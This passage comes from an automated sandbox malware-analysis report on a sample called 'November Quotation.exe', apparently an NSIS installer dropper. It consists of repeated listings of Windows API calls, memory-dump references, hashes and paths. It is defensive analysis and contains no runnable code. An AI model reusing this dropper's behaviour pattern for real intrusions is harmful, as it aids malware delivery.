                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 3585118688-0
                                                                                                              • Opcode ID: 39bb2898ad4b50b553eb7c58e0b62157dd7eb3bd8abb565d11477b9b2c16ae84
                                                                                                              • Instruction ID: b5f73ffbd4a1fa015f0c2796452332fd916e9637aff9300d1e3c67c2e8cabf32
                                                                                                              • Opcode Fuzzy Hash: 39bb2898ad4b50b553eb7c58e0b62157dd7eb3bd8abb565d11477b9b2c16ae84
                                                                                                              • Instruction Fuzzy Hash: C911AD71900204EBCF109FA1CE449EE7AB1EF04315F20443BF901B61E1C7798A929F99
                                                                                                              APIs
                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 00405541
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040554E
                                                                                                              Strings
                                                                                                              • Error launching installer, xrefs: 0040552F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                              • String ID: Error launching installer
                                                                                                              • API String ID: 3712363035-66219284
                                                                                                              • Opcode ID: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                                                                              • Instruction ID: cf9fdeca5e40bc41ee8c953bab838b17ccc92df15d25727223da148b4173978b
                                                                                                              • Opcode Fuzzy Hash: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                                                                              • Instruction Fuzzy Hash: 41E0ECB4500309ABEB00AF64DD49E6F7BBDEB04344F008575A950F2150D774D9148B68
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406035: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\November Quotation.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,76F93420,004033E1), ref: 00406098
                                                                                                                • Part of subcall function 00406035: CharNextW.USER32(?,?,?,00000000), ref: 004060A7
                                                                                                                • Part of subcall function 00406035: CharNextW.USER32(?,"C:\Users\user\Desktop\November Quotation.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,76F93420,004033E1), ref: 004060AC
                                                                                                                • Part of subcall function 00406035: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,76F93420,004033E1), ref: 004060BF
                                                                                                              • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004033E1), ref: 00403216
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 4115351271-3283962145
                                                                                                              • Opcode ID: d87fad949052cfa03a28e6d8598cf07e7846d7f9d3ec73566398795b30735e76
                                                                                                              • Instruction ID: 8e868994f3d2bbac58875734e477fdd5edfa4fc47c6a96a7a7d594daf79fb191
                                                                                                              • Opcode Fuzzy Hash: d87fad949052cfa03a28e6d8598cf07e7846d7f9d3ec73566398795b30735e76
                                                                                                              • Instruction Fuzzy Hash: FBD0C92214693062D652376A7D4AFCF0D0C8F063AEF26407BF804B51E69B7C0AC649FE
                                                                                                              APIs
                                                                                                                • Part of subcall function 004060E4: FindFirstFileW.KERNELBASE(?,00430248,0042FA00,0040593D,0042FA00,0042FA00,00000000,0042FA00,0042FA00,?,?,76F93420,00405649,?,C:\Users\user\AppData\Local\Temp\,76F93420), ref: 004060EF
                                                                                                                • Part of subcall function 004060E4: FindClose.KERNEL32(00000000), ref: 004060FB
                                                                                                              • lstrlenW.KERNEL32 ref: 004021DE
                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 004021E9
                                                                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402212
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                              • String ID:
                                                                                                              • API String ID: 1486964399-0
                                                                                                              • Opcode ID: 4c52480852426a7bac7053a20cdf3037ed575b9552ceb17ca9d572b58a457d66
                                                                                                              • Instruction ID: 9dad3a0a77e1bf939c0c6680d4adf505a9909db01fa6afbdf40bd720d464a3e7
                                                                                                              • Opcode Fuzzy Hash: 4c52480852426a7bac7053a20cdf3037ed575b9552ceb17ca9d572b58a457d66
                                                                                                              • Instruction Fuzzy Hash: 381152B1D10214A6DB10EFF98949A9FB7F8EF14354F20843BB901F72C1D6B8D5418B59
                                                                                                              APIs
                                                                                                                • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402481
                                                                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402494
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,reformandum\desperations\,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Enum$CloseOpenValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 167947723-0
                                                                                                              • Opcode ID: 217a9d672533338bf1ff0d8f5e67b57efd82a9b11a273fcebfe714e2289d8bbd
                                                                                                              • Instruction ID: c9031ee09ce8bee28904ed1c285a81cc521ca788ea043c2b6b00717a23bbda57
                                                                                                              • Opcode Fuzzy Hash: 217a9d672533338bf1ff0d8f5e67b57efd82a9b11a273fcebfe714e2289d8bbd
                                                                                                              • Instruction Fuzzy Hash: 0EF0F4B1600205AFE7108F65DE8CABF767CEF40358F21443EF445B21C0DAB85D409B29
                                                                                                              APIs
                                                                                                              • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\sognenes\iconograph\Folkways,?), ref: 00401E3D
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\sognenes\iconograph\Folkways, xrefs: 00401E26
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExecuteShell
                                                                                                              • String ID: C:\Users\user\AppData\Local\sognenes\iconograph\Folkways
                                                                                                              • API String ID: 587946157-2186690595
                                                                                                              • Opcode ID: 305349eb020df08448b5d50809124919985bb7b4fb1a77f9efced48ddc0a4677
                                                                                                              • Instruction ID: 1911b2733719e8945681546b31a0b6b9e0b67ed3329d32444ff49021a4b7533d
                                                                                                              • Opcode Fuzzy Hash: 305349eb020df08448b5d50809124919985bb7b4fb1a77f9efced48ddc0a4677
                                                                                                              • Instruction Fuzzy Hash: 63F0F675750200ABDB006FB5DD4AE9E33B4AB64729F200937F501F70C1D6FC88419629
                                                                                                              APIs
                                                                                                                • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,reformandum\desperations\,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3677997916-0
                                                                                                              • Opcode ID: 8e4d3bbcc235162c1b761f06bac2d3ef5ae97913073b4f3d0e1b8fe8612a2e4a
                                                                                                              • Instruction ID: 546e44f20ace30403b8508f380f469907ed62c60589eb312f7573fc2108540a6
                                                                                                              • Opcode Fuzzy Hash: 8e4d3bbcc235162c1b761f06bac2d3ef5ae97913073b4f3d0e1b8fe8612a2e4a
                                                                                                              • Instruction Fuzzy Hash: A911A071910205EEDB14CFA1D6585AFB7B4EF44359F60843FE042B72D0D6B85A81DB1A
                                                                                                              APIs
                                                                                                                • Part of subcall function 00405DA1: lstrcpynW.KERNEL32(?,?,00000400,00403297,inelegancy,NSIS Error), ref: 00405DAE
                                                                                                                • Part of subcall function 00405897: CharNextW.USER32(?,?,0042FA00,?,0040590B,0042FA00,0042FA00,?,?,76F93420,00405649,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\November Quotation.exe"), ref: 004058A5
                                                                                                                • Part of subcall function 00405897: CharNextW.USER32(00000000), ref: 004058AA
                                                                                                                • Part of subcall function 00405897: CharNextW.USER32(00000000), ref: 004058C2
                                                                                                              • lstrlenW.KERNEL32(0042FA00,00000000,0042FA00,0042FA00,?,?,76F93420,00405649,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\November Quotation.exe"), ref: 0040594D
                                                                                                              • GetFileAttributesW.KERNELBASE(0042FA00,0042FA00,0042FA00,0042FA00,0042FA00,0042FA00,00000000,0042FA00,0042FA00,?,?,76F93420,00405649,?,C:\Users\user\AppData\Local\Temp\,76F93420), ref: 0040595D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3248276644-0
                                                                                                              • Opcode ID: cd2193e6ee1c67ae5667af4e62644cc98a6e4327366d56b7c00c257de948fe30
                                                                                                              • Instruction ID: 610436a2e5c1157707da2728d4346669165aef2434031830238a40225a595fac
                                                                                                              • Opcode Fuzzy Hash: cd2193e6ee1c67ae5667af4e62644cc98a6e4327366d56b7c00c257de948fe30
                                                                                                              • Instruction Fuzzy Hash: D9F0D166109E61A6DA22323A0C45BAF1948CEC2334B1A413FF851B22D2CB3C8A42DC6D
                                                                                                              APIs
                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              • Opcode ID: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                                                                              • Instruction ID: adb52dfa00387397cd87161f5118bdb5a91708942fcdcec178a456792abf2482
                                                                                                              • Opcode Fuzzy Hash: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                                                                              • Instruction Fuzzy Hash: 5101F4316202209BE7095B389D09B6A76D8E711719F10863FF851F72F1D6B8CC429B4C
                                                                                                              APIs
                                                                                                                • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004022FB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseDeleteOpenValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 849931509-0
                                                                                                              • Opcode ID: 6b91828f98445935603cc47a0e19e75a868b40853c3e15e7aeb3e7201bfa0766
                                                                                                              • Instruction ID: adb3a0c882efced5b2b33e62a575662e5a0d3d88276fd09d1e11bfde7dcb239e
                                                                                                              • Opcode Fuzzy Hash: 6b91828f98445935603cc47a0e19e75a868b40853c3e15e7aeb3e7201bfa0766
                                                                                                              • Instruction Fuzzy Hash: 64F04F72A00211ABEB00AFA59A8EAAE73689B54314F65443BF541B71C1D9BC5D014A2D
                                                                                                              APIs
                                                                                                              • ShowWindow.USER32(00010464,?), ref: 0040157F
                                                                                                              • ShowWindow.USER32(0001045E), ref: 00401594
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ShowWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1268545403-0
                                                                                                              • Opcode ID: b1e2e0154a3e16cae0d69ab16941a4ec8d08f5865f6cc97ee8173bf1a6db7562
                                                                                                              • Instruction ID: f53948f413ae75f0fb589c5712c424d9d859404a389dc1b013ab1cc4e6e9cff8
                                                                                                              • Opcode Fuzzy Hash: b1e2e0154a3e16cae0d69ab16941a4ec8d08f5865f6cc97ee8173bf1a6db7562
                                                                                                              • Instruction Fuzzy Hash: B1E086B7B10104DBCB04CFA8ED808ADB3A6EB48311725053FD902B3290C675ED40CF28
                                                                                                              APIs
                                                                                                              • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$EnableShow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1136574915-0
                                                                                                              • Opcode ID: 2e3c38ced10844c1f89000f967576cb7b7b3550329efd427a3e1ae9871f18f13
